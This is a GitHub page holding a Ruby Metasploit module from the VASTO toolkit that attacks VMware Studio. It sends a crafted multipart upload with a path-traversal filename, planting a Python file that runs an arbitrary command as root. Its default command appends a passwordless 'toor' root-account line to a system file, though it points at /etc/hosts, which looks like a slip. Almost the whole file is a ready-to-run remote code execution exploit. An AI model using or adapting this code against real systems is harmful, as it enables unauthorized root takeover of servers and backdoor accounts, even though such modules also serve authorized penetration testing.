-
Notifications
You must be signed in to change notification settings - Fork 3
/
vmware_studio_upload.rb
74 lines (59 loc) · 2.28 KB
/
vmware_studio_upload.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#################################################################
# #
# This module is part of VASTO #
# Version 0.4 #
# Virtualization ASsessment TOolkit #
# #
#################################################################
require 'msf/core'
require "rexml/document"
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
#include Msf::Auxiliary::WMAPScanServer
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'VMware Studio < 2.0.0.946-172280 Remote Code Execution',
'Version' => '0.9',
'Description' => ' This module exploits VMware Studio 2 Beta (<2.0.0.946-172280) vulnerability. It can upload any arbitrary file on the system, which can then be executed if they are python files. They will run as root on the system.',
'Author' => 'Claudio Criscione - [email protected]',
'License' => GPL_LICENSE
)
deregister_options('Proxies')
deregister_options('VHOST')
deregister_options('SSL')
deregister_options('RPORT')
register_options(
[
OptPort.new('RPORT', [ true, "The target port", 5480 ]),
OptBool.new('SSL', [ true, "Use SSL", true ]),
OptString.new('FileName', [true, "Uploaded file name and path", "/opt/vmware/share/htdocs/rndupload.py"]),
OptString.new('CMD', [true, "Command to execute", "echo 'toor::0:0:root:/root:/bin/bash'>> /etc/hosts"])
], Auxiliary::Scanner)
end
def run_host(ip)
begin
boundary = 'abcdef'
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"servicetar\"; "
data << "filename=/../../../../../" + datastore['FileName'] + "\r\nContent-Type: text/plain\r\n\r\n"
data << "#/usr/bin/python \r\n"
data << "import os \r\n"
data << "os.system(\""+datastore['CMD']+"\") \r\n"
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => "/service/depot/upload-tar.py",
'method' => 'POST',
'vhost' => ip,
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
}
}, 25)
print_status("Successfully uploaded "+datastore['FileName'])
end
end
end